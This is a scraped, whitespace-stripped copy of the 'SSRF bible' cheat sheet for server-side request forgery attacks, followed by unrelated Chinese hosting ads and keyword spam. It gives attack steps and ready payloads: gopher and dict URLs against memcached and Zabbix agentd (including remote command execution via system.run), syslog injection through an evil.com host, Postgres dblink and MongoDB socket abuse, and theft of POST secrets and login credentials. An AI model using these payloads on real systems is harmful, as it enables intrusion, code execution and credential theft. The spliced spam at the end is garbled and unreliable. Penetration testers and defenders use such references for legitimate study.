SSRFbible.Cheatsheet

pastebin.com  时间:2021-04-05  阅读:()

Ifyouhaveanyquestions,pleaseposttheminthecomments!
Revision1.
026august2014Authors:@ONsec_Labhttp://lab.
onsec.
ru[ENG]@Wallarmresearchteamblog.
wallarm.
com1TableofcontentsTableofcontentsBasicsTypicalattackstepsFileDescriptorsexploitationwayURLschemasupportProtocolsSSRFsmugglingSmugglingexamplesApachewebserverHTTPparserNginxwebserverHTTPparserVulnerabilitiesBasicsExamplesGoogleDocsZeroNightshackquestchallengeExploitationtricksBypassingrestrictionsInputvalidationUnsaferedirectDNSpinningPHPfsockopen()urlparsingtricksNetworkrestrictionsProtocolfingerprintingExamplesHTTPMemcachedRetrievingdataExamplesHTTPresponseencapsulationintoXMLformattedresponse2ConsolecURLwildcardsURLresponsesconcatenationSMBRelayexploitationOriginalrequestdatasniffingExamplesMemcachedExploitsPHPFPMSyslogExploitsZabbixagentdExploitsPostgresExploitsMongoDBCouchDBExploitsFFmpegReferencesToolsResearches3BasicsSSRFServerSideRequestForgeryattacks.
Theabilitytocreaterequestsfromthevulnerableservertointra/internet.
UsingaprotocolsupportedbyavailableURIschemas,youcancommunicatewithservicesrunningonotherprotocols.
Herewecollectthevariousoptionsandexamples(exploits)ofsuchinteraction.
Seeforintroductionrelatedresearches.
Typicalattacksteps1.
Scaninternalnetworktodetermineinternalinfrastructurewhichyoumayaccess2.
Collectopenedportsatlocalhostandotherinternalhostswhichyouwant(basicallybytimebaseddetermination)3.
Determineservices/daemonsonportsusingwikiordaemonsbanners(ifyoumaywatchoutput)4.
DeterminetypeofyouSSRFcombination:Directsocketaccess(suchasthisexample)Socketsclient(suchasjavaURI,cURL,LWP,others)5.
IncaseofdirectsocketaccessdetermineCRLFandotherinjectionsforsmuggling6.
Incaseofsocketsclient,determineavailableURIschemas7.
Compareavailableschemasandservices/daemonsprotocolstofindsmugglingpossibilities8.
DeterminehostbasedauthdaemonsandtrytoexploititFileDescriptorsexploitationwayUsefulinclouds,sharedhostingsandotherslargeinfrastructures.
Firstreadslides2021aboutFDsand2223aboutProcFSfromthispaper.
TherearethreewaystoaccesstoFDs:InterpretersAPI(suchasfd://wrapperforPHP)IftherearenosuchAPIorrequiredfunctionsdisabled,youcantrytoloadnativeextension:PHP(requiredlopen,butnotexec):https://github.
com/dhotson/fdopenphpexec()callfromAPI(suchasexec('echo123>&'))youmayaccessonlyFDswithoutO_CLOEXECflag.
CprogramtoscanavailableFDsishere:https://github.
com/ONsecLab/scripts/blob/master/listopenfd.
c.
ProcFSfiles(/proc//fd/)*Note,thatyoucannotaccesstosocketsthrough/proc//fd/files!
4URLschemasupportPHPJavacURLLWPASP.
NET1gopherenablebywithcurlwrappersbeforelastpatchesw/o\0char+ASP.
NETloadXML($resp)//echo$resp.
"nn"echo$doc>getElementsByTagName("error")>item(0)>nodeValueif(libxml_get_errors()!
=null){print_r(libxml_get_errors())}>10ExploitationtricksBypassingrestrictionsBasicallyrestrictionswhichyoumayfindinSSRFexploitationcanbesplitintotwogroups:Inputvalidation(suchasregularexpressionURLfilter)Networkrestrictions(firewallsrules)InputvalidationUnsaferedirectEasywaytobypassinputvalidationisURLredirection.
HTTPclientsnotabrowsers.
Therearenormallytodounsaferedirect(exceptofJavacase).
WorksfineforcURL,LWP,ASP.
NET(exploit:http://anyhostwithredirest.
com/>gopher://localhost:11211/1stats%0aquit).
DNSpinningTobypassdomainvalidationyoumaysimpleusepinningtechnique.
Forexample,defineAorAAAArecordsonyourDNSservertoyoursubdomainsintovictim'sintranet:$nslookuplocal.
oxod.
ruNonauthoritativeanswer:Name:local.
oxod.
ruAddress:127.
0.
0.
13.
php]]>//validfooterforreadableformat15SMBRelayexploitationThistechniquedescribedinrelatedresearch"SSRF+Java+Windows=Love".
IncaseofJavabasedapplicationonOSWindowstarget,attackercanexecuteanNTLMrelayattackoverHTTP.
It'spossiblebecauseJavahasaninternalHTTPclient,whichsupportsNTLMauthenticationbydefault.
OriginalrequestdatasniffingInmanycasesthereareusefultosniffdataofinitialrequestusingSSRF.
ItsmaybeOAuthtokens,basicauthcredential,POSTbodiesandothers.
Thisproblemcanbesolvedifyouhavetheabilitytomodifytheserver'sresponse.
Youmustbeinfluencetheresponsefromaoneserver,onreceiptofarequestfromanotherserver.
Itwilllooklikeopenredirect(WASC38)orresponsesplitting/smuggling(WASC25,WASC27),butthereareserver'shttplibrarysuchascURLinsteadoftheuser'sbrowser.

307HTTPstatus(TemporaryRedirectExplained)andotherscanbeusedtoretrieveoriginalPOSTbody.
TableofPOSTredirection:Lib/Status300301302303304305306307308cURLOKOKOKOKLWPPHP16Example:$url="http://localhost/tests/redir.
phps={$_GET['s']}&r=http://localhost:8000/"$ch=curl_init($url)curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1)curl_setopt($ch,CURLOPT_POST,1)curl_setopt($ch,CURLOPT_POSTFIELDS,"key=secret")$resp=curl_exec($ch)Youcansteal"key=secret"databyusingopenredirectvulnerabilitywithresponsestatuses300,305,306,307orbyhttpresponsesplitting/httpheaderinjectionvulnerabilities.
AndtherearenowaystostealsecretinLWPcase:usestrictusewarningsmy$b=LWP::UserAgent>newmy$u='http://localhost/tests/redir.
phps=307&r=http://localhost:8000/a'$b>post($u,{'key'=>'secret'})17ExamplesSSRFalsoopenagatetovariousNoSQLattackssuchasServerSideJavaScriptinjections.
MemcachedProtocoldocumentation:https://github.
com/memcached/memcached/blob/master/doc/protocol.
txtExploitationsteps:1.
collectallkeys2.
determineinterestingkeys3.
replacekey'svaluestoarbitraryExploitationstechniques:FindHTMLtemplatesandinjectJSloginsniffertocollectlogin/passwordsFinddynamictemplates(macros,PHP,others)andinjectarbitrarycode(RCE)FindyoursessionandescalateyourprivilegesCreatenewsessionwithlongexpirationandsetadminprivilegesExploitsgopher://localhost:11211/1%0astats%0aquitdict://locahost:11211/statsldap://localhost:11211/%0astats%0aquit18PHPFPMExploitlocalinstallationtobypassrestrictionssuchassafe_modeandothershttp://pastebin.
com/XP2BYmR7SyslogTypicallyUDPbutreallycommonlistenonTCPport514.
Youmayaddstringstosyslogeasily.
Exploithttp://stringthatyouwanttoadd.
evil.
com:514/FirstconfigureDNStoresolvestringthatyouwanttoadd.
evil.
comas127.
0.
0.
1HTTPrequest:GET/aHTTP/1.
1Host:stringthatyouwanttoadd.
evil.
com:8000Connection:KeepAliveSyslogentities:Nov2300:53:50localhostHost:stringthatyouwanttoadd.
evil.
com:8000#015Nov2300:53:50localhostConnection:KeepAlive#015Nov2300:53:50localhost#015CRLFinjectionmakesyslogentitiesmoreclear(seebelow).
Exploitsdict://localhost:514/ALARM!
!
!
ldap://localhost:514/\r\nALARM!
!
!
(LWPonly)Syslogentities:Nov2300:53:50localhostALARM!
!
!
#01519ZabbixagentdZabbixisverycommonmonitoringsystem.
Monitoredserversrunningzabbix_agentdbinarywhichconfiguredby/etc/zabbix/zabbix_agentd.
conffile.
Defaultlistenedportis10050.
Zabbixagentdhaveonlyhostbasedauthorization,describedinconfigfile:Server=127.
0.
0.
1,monitor.
trusted.
network.
netTherearetypicallytoinclude127.
0.
0.
1intoauthorizedserversbydebuggingreasonsandbydefault.
Agentdprotocolisplain/textandsimple:"\n"usingaslineterminatorandpacketformatis"item[key]".
Allavailableitemslistedbelow:http://www.
zabbix.
com/documentation/1.
8/manual/config/items.
Zabbixagentdclosesocketafterfirstmalformedline(requestunexistingkeyforexample).
Soyoucan'tusesmugglingiffirstlineofrequestisnotcontrolledbyyou.
Sometimesagentdconfiguredtorunarbitrarycommandsfromservers(itemsystem.
ruusedtoruncommandsfromkeyargument):EnableRemoteCommands=1Exploitsgopher://localhost:10050/1vfs.
file.
regexp[/etc/hosts,7]Serverresponse:ZBXD127.
0.
0.
1localhostads.
localhostlocalhost.
vvasd.
localhost.
vvgopher://localhost:10050/1system.
run[ls]Serverresponse:ZBXD,usretcvarboot20PostgresAnyfunctionswhichcanopensocketsandwriteuser'sdataintoitcanbeexploitedforSSRF.
Suchasfunctionstoexternaldatabaseconnectionswhichprovidedbyallmoderndatabases(DB2/Oracle/Postgres/etc).
AttackermayusethisfunctionsthroughSQLinjectiontoexploitanythinginintranet.
DBLINKdesciption:http://www.
postgresql.
org/docs/8.
4/static/dblink.
html.
Syntaxofconnectionstringavailablehere:http://www.
postgresql.
org/docs/8.
4/static/libpqconnect.
htmlExploitsSELECTdblink_send_query('host=127.
0.
0.
1dbname=quituser=\'\nstats\n\'password=1port=11211sslmode=disable','selectversion()')MongoDBAttackermayusedifferentinternalfunctions,suchascopyDatabase()andotherstoopenarbitrarysocketandputsarbitrarydataintoit.
ExploitsWritebinarydataintosocket:>db.
copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000')$ncl8000|hexdumpC000000003b0000002800000000000000d4070000|.
0000001000000000010203040506072e73797374syst|00000020656d2e6e616d65737061636573000000|em.
namespaces.
.
.
|Communicatewithmemcached:>db.
copyDatabase("\nstats\nquit",'test','localhost:11211')21CouchDBCouchDBisreallycooltargetforSSRFattacks.
ThereareHTTPRESTAPIwhichprovideattackertoexploititusingonlyvalidHTTPrequestswithoutanysmuggling.
APIdetails:http://wiki.
apache.
org/couchdb/Complete_HTTP_API_Reference.
POST/PUT/DELETErequestsmaybeforgedalsobysmugglingtechniquestoexecuteserversideJScodeforexample.

ftlcloud9元/月,美国云服务器,1G内存/1核/20g硬盘/10M带宽不限/10G防御

ftlcloud(超云)目前正在搞暑假促销,美国圣何塞数据中心的云服务器低至9元/月,系统盘与数据盘分离,支持Windows和Linux,免费防御CC攻击,自带10Gbps的DDoS防御。FTL-超云服务器的主要特色:稳定、安全、弹性、高性能的云端计算服务,快速部署,并且可根据业务需要扩展计算能力,按需付费,节约成本,提高资源的有效利用率。活动地址:https://www.ftlcloud.com...

Webhosting24:$1.48/月起,日本东京NTT直连/AMD Ryzen 高性能VPS/美国洛杉矶5950X平台大流量VPS/1Gbps端口/

Webhosting24宣布自7月1日起开始对日本机房的VPS进行NVMe和流量大升级,几乎是翻倍了硬盘和流量,价格依旧不变。目前来看,日本VPS国内过去走的是NTT直连,服务器托管机房应该是CDN77*(也就是datapacket.com),加上高性能平台(AMD Ryzen 9 3900X+NVMe),还是有相当大的性价比的。此外在6月30日,又新增了洛杉矶机房,CPU为AMD Ryzen 9...

wordpress外贸企业主题 wordpress经典外贸企业建站主题

WordPress经典外贸企业建站主题,经典配色扁平化简约设计+跨屏自适应移动端设备,特色外贸企业建站功能模块+在线Inquiry询单功能,更有利于Google等英文搜索优化和站点收录。采用标准的HTML5+CSS3语言开发,兼容当下的各种主流浏览器: IE 6+(以及类似360、遨游等基于IE内核的)、Firefox、Google Chrome、Safari、Opera等;同时支持移动终端的常用...

pastebin.com为你推荐
Baby被问婚变绯闻黄晓明婚礼上说baby碰他哪里最兴奋bbs.99nets.com送点卷的冒险岛私服18comic.fun黑色禁药http://www.lovecomic.cn/attachment/Fid_18/18_4_00d3b0cb502ea74.jpg这幅画名字叫什么?7788k.comwww.8855k.com是个什么网站lunwenjiance我写的论文,检测相似度是21.63%,删掉参考文献后就只有6.3%,这是为什么?www.622hh.comwww.710av.com怎么不可以看了www.niuav.com给我个看电影的网站www.7788k.comwww.6601txq.com.有没有这个网站www.henhenlu.com有一个两位数,十位数字是个位数字的二分之一,将十位数字与个位数字对调,新的两位数比原来大36,这个两位数www.ca800.comPLC好学吗
东莞服务器租用 ddos hostmonster win8.1企业版升级win10 华为云主机 中国特价网 架设服务器 lol台服官网 超级服务器 美国凤凰城 德讯 ledlamp ping值 hosts文件修改 studentmain 最好的空间留言 qq空间论坛 护卫神主机管理系统 web服务器软件下载 双宿主机 更多